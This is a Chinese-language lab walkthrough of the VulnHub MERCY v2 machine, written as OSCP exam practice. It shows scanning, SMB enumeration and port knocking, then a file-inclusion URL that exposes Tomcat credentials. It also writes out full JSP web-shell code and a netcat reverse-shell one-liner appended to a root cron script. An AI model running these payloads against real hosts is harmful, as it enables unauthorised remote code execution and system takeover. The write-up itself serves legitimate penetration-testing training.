泷羽Sec-尘宇安全
前言
oscp备考,oscp系列——MERCY (v2)靶场:SMB共享文件+用户名枚举,端口碰撞,RIPS本地文件包含,tomcat-getshell,计划任务提权
难度简单偏上
- 对于低权限shell获取涉及:SMB共享文件+用户名枚举,端口碰撞,RIPS本地文件包含,tomcat-getshell
- 对于提权:计划任务提权
下载地址:
https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/
nmap
主机发现
└─# nmap -sn 10.10.10.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 21:08 CST
Nmap scan report for 10.10.10.1
Host is up (0.00088s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00015s latency).
MAC Address: 00:50:56:F2:C6:98 (VMware)
Nmap scan report for 10.10.10.150
Host is up (0.0027s latency).
MAC Address: 00:0C:29:3B:46:30 (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00072s latency).
MAC Address: 00:50:56:E3:2F:42 (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.09 seconds
端口扫描
发现22和80端口被禁止了,可能需要敲门
└─# nmap --min-rate 10000 -p- 10.10.10.150
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 21:09 CST
Nmap scan report for 10.10.10.150
Host is up (0.0025s latency).
Not shown: 65525 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp filtered http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3s
8080/tcp open http-proxy
MAC Address: 00:0C:29:3B:46:30 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.36 seconds
└─# nmap --min-rate 10000 -p- 10.10.10.150 -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 21:10 CST
Warning: 10.10.10.150 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.150
Host is up (0.00076s latency).
Not shown: 65453 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
PORT STATE SERVICE
53/udp open domain
123/udp open ntp
137/udp open netbios-ns
5353/udp open zeroconf
MAC Address: 00:0C:29:3B:46:30 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 73.00 seconds
详细端口扫描
└─# ports=$(grep open ports.nmap | awk -F '/' '{print $1}' | paste -sd ',')
┌──(root㉿192)-[/home/kali/桌面/nmap]
└─# echo $ports
53,110,139,143,445,993,995,8080
└─# nmap -sV -sT -sC -O -p$ports 10.10.10.150
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 21:15 CST
Nmap scan report for 10.10.10.150
Host is up (0.00078s latency).
Bug in imap-capabilities: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.17-Ubuntu
110/tcp open pop3?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after: 2028-08-23T13:22:55
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after: 2028-08-23T13:22:55
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after: 2028-08-23T13:22:55
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after: 2028-08-23T13:22:55
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
| http-robots.txt: 1 disallowed entry
|_/tryharder/tryharder
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 00:0C:29:3B:46:30 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: mercy
| NetBIOS computer name: MERCY\x00
| Domain name: \x00
| FQDN: mercy
|_ System time: 2025-02-17T21:18:15+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-02-17T13:18:15
|_ start_date: N/A
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.16 seconds
└─# nmap -sV -sT -sC -O -p5353 10.10.10.150 -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 21:35 CST
Nmap scan report for 10.10.10.150
Host is up (0.00052s latency).
PORT STATE SERVICE VERSION
5353/tcp closed mdns
5353/udp open mdns DNS-based service discovery
| dns-service-discovery:
| 9/tcp workstation
|_ Address=10.10.10.150 fe80::20c:29ff:fe3b:4630
MAC Address: 00:0C:29:3B:46:30 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.15 seconds
vuln扫描
└─# nmap --script=vuln -p$ports 10.10.10.150
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 21:36 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.150
Host is up (0.00035s latency).
PORT STATE SERVICE
53/tcp open domain
110/tcp open pop3
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| TLS_FALLBACK_SCSV properly implemented
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://www.securityfocus.com/bid/70574
|_ https://www.imperialviolet.org/2014/10/14/poodle.html
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
139/tcp open netbios-ssn
143/tcp open imap
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| TLS_FALLBACK_SCSV properly implemented
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://www.securityfocus.com/bid/70574
|_ https://www.imperialviolet.org/2014/10/14/poodle.html
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
445/tcp open microsoft-ds
993/tcp open imaps
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| TLS_FALLBACK_SCSV properly implemented
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://www.securityfocus.com/bid/70574
|_ https://www.imperialviolet.org/2014/10/14/poodle.html
995/tcp open pop3s
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| TLS_FALLBACK_SCSV properly implemented
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://www.securityfocus.com/bid/70574
|_ https://www.imperialviolet.org/2014/10/14/poodle.html
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
8080/tcp open http-proxy
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-enum:
| /examples/: Sample scripts
| /robots.txt: Robots file
| /manager/html/upload: Apache Tomcat (401 Unauthorized)
| /manager/html: Apache Tomcat (401 Unauthorized)
|_ /docs/: Potentially interesting folder
MAC Address: 00:0C:29:3B:46:30 (VMware)
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-061: false
Nmap done: 1 IP address (1 host up) scanned in 100.44 seconds
信息收集
smb,139&445
共享文件
查看一下共享文件,发现不能访问
smbclient -L 10.10.10.150
得到
print$
qiu
用户名枚举
枚举一下用户名
└─# enum4linux -a 10.10.10.150 >1.txt
┌──(root㉿192)-[/home/kali/桌面/测试]
└─# awk -F '\' 'NF>1{print $2}' 1.txt | awk 'NF>0{print $1}' > output.txt
┌──(root㉿192)-[/home/kali/桌面/测试]
└─# cat output.txt
*
nobody
None
pleadformercy
qiu
Administrators
Users
Guests
Power
Account
Server
Print
pleadformercy
qiu
thisisasuperduperlonguser
fluffy
┌──(root㉿192)-[/home/kali/桌面/测试]
└─#
得到一些用户名
nobody
None
pleadformercy
qiu
Administrators
Users
Guests
Power
Account
Server
Print
pleadformercy
qiu
thisisasuperduperlonguser
fluffy
web页面,8080
发现是tomcat7.0.52
提示了俩个用户
manager-gui
admin-gui
尝试一下任意文件写入(CVE-2017-12615)漏洞
- Tomcat 7.0.0 - 7.0.81,8.5.19
看一下是否可以使用PUT协议
curl -v -X OPTIONS http://10.10.10.150:8080/
发现可以使用PUT协议,先验证一下可不可以使用
curl -v -X PUT -d 'aaaa' http://10.10.10.150:8080/1.txt
发现没有成功,回显是201才可以
目录扫描
其他的都是tomcat的内置的目录,发现有robots.txt,访问一下
得到一个目录
/tryharder/tryharder
访问一下,发现是base64加密
解密一下,说有员工设置了一个 password 弱密码
之前提示了两个用户,先尝试登录后台
http://10.10.10.150:8080/manager/html
尝试失败
还可以尝试一下smb共享文件夹,使用-U指定用户名,之前smb得到的文件夹有qiu,枚举得到的用户名也有一个是qiu,尝试连接
smbclient //10.10.10.150/qiu -U qiu
成功连接,使用mget批量下载一下
有三个目录,使用cd命令进入,全部下载一下
smb: \> cd .public
smb: \.public\> ls
. D 0 Sun Aug 26 22:23:24 2018
.. D 0 Sat Sep 1 03:07:00 2018
resources D 0 Sun Aug 26 22:24:21 2018
19213004 blocks of size 1024. 16314056 blocks available
smb: \.public\> cd resources
smb: \.public\resources\> ls
. D 0 Sun Aug 26 22:24:21 2018
.. D 0 Sun Aug 26 22:23:24 2018
smiley N 54 Sun Aug 26 22:24:21 2018
19213004 blocks of size 1024. 16314056 blocks available
smb: \.public\resources\> get smiley
getting file \.public\resources\smiley of size 54 as smiley (8.8 KiloBytes/sec) (average 230.6 KiloBytes/sec)
smb: \.public\resources\> cd ..
smb: \.public\> cd ..
smb: \> cd .private
smb: \.private\> ls
. D 0 Mon Aug 27 00:35:34 2018
.. D 0 Sat Sep 1 03:07:00 2018
opensesame D 0 Fri Aug 31 00:36:50 2018
readme.txt N 94 Sun Aug 26 22:22:35 2018
secrets D 0 Tue Nov 20 01:01:09 2018
19213004 blocks of size 1024. 16314056 blocks available
smb: \.private\> mget readme.txt
Get file readme.txt? y
getting file \.private\readme.txt of size 94 as readme.txt (15.3 KiloBytes/sec) (average 202.5 KiloBytes/sec)
smb: \.private\> cd opensesame
smb: \.private\opensesame\> ls
. D 0 Fri Aug 31 00:36:50 2018
.. D 0 Mon Aug 27 00:35:34 2018
configprint A 539 Fri Aug 31 00:39:14 2018
config N 17543 Sat Sep 1 03:11:56 2018
19213004 blocks of size 1024. 16314056 blocks available
smb: \.private\opensesame\> mget co*
Get file configprint? y
getting file \.private\opensesame\configprint of size 539 as configprint (131.6 KiloBytes/sec) (average 196.8 KiloBytes/sec)
Get file config? y
getting file \.private\opensesame\config of size 17543 as config (2447.4 KiloBytes/sec) (average 473.2 KiloBytes/sec)
smb: \.private\opensesame\> cd ..
smb: \.private\> cd secrets
smb: \.private\secrets\> ls
. D 0 Tue Nov 20 01:01:09 2018
.. D 0 Mon Aug 27 00:35:34 2018
19213004 blocks of size 1024. 16314056 blocks available
smb: \.private\secrets\> cd ..
smb: \.private\> cd ..
smb: \> cd .cache
smb: \.cache\> ls
. D 0 Sat Sep 1 02:22:05 2018
.. D 0 Sat Sep 1 03:07:00 2018
motd.legal-displayed N 0 Sat Sep 1 02:22:05 2018
19213004 blocks of size 1024. 16314056 blocks available
smb: \.cache\>
端口碰撞,knock
然后查看一下,在config文件内发现了敲门端口
[openHTTP]
sequence = 159,27391,4
[openSSH]
sequence = 17301,28504,9999
使用knock工具进行敲门
knock -v 10.10.10.137 159 27391 4
knock -v 10.10.10.137 17301 28504 9999
发现关闭的端口已经开放了
web页面,80
目录扫描
发现robots.txt,访问一下
得到两个目录,访问一下
Disallow: /mercy
Disallow: /nomercy
发现一个cms系统
漏洞利用
RIPS本地文件包含漏洞
识别并查找一下漏洞,发现存在本地文件包含漏洞
查看一下
访问
http://10.10.10.150/nomercy/windows/code.php?file=../../../../../../etc/passwd
验证成功
通过之前tomcat初始页面,或者搜索一下,得到账号和密码存放的文件是
/etc/tomcat7/tomcat-users.xml
包含一下
<? <role rolename="admin-gui"/>
<? <role rolename="manager-gui"/>
<? <user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>
<? <user username="fluffy" password="freakishfluffybunny" roles="none"/>
tomcat-getshell
得到二个用户的账号和密码
thisisasuperduperlonguser/heartbreakisinevitable
fluffy/freakishfluffybunny
使用thisisasuperduperlonguser/heartbreakisinevitable登录
http://10.10.10.150:8080/manager/html
发现可以上传war包
创建一个1.jsp文件
<%
if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
打包成功war压缩文件
jar cvf 1.war 1.jsp
上传
发现出现在列表里面了
访问
http://10.10.10.150:8080/1/1.jsp?pwd=023&i=ls
成功
不过使用命令不能反弹shell,只能在上传一个反弹shell脚本了,找到一个下面地址
https://github.com/LaiKash/JSP-Reverse-and-Web-Shell
访问一下
http://10.10.10.150:8080/reverse/reverse.jsp
成功反弹shell
提权
先获取一下交互式终端
python -c 'import pty;pty.spawn("/bin/bash")'
发现没有gcc,内核提权放弃了
访问一下/home目录就只有thisisasuperduperlonguser可以进入,查看一下
计划任务提权
我们之前文件包含的时候还得到过一个账号密码
fluffy/freakishfluffybunny
尝试切换成fluffy用户
访问一下fluffy用户目录,发现一个计划任务
写入一下反弹shell命令
echo "rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 10.10.10.128 9999 1>/tmp/p" >> timeclock
等待了几分钟,成功获取root权限
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
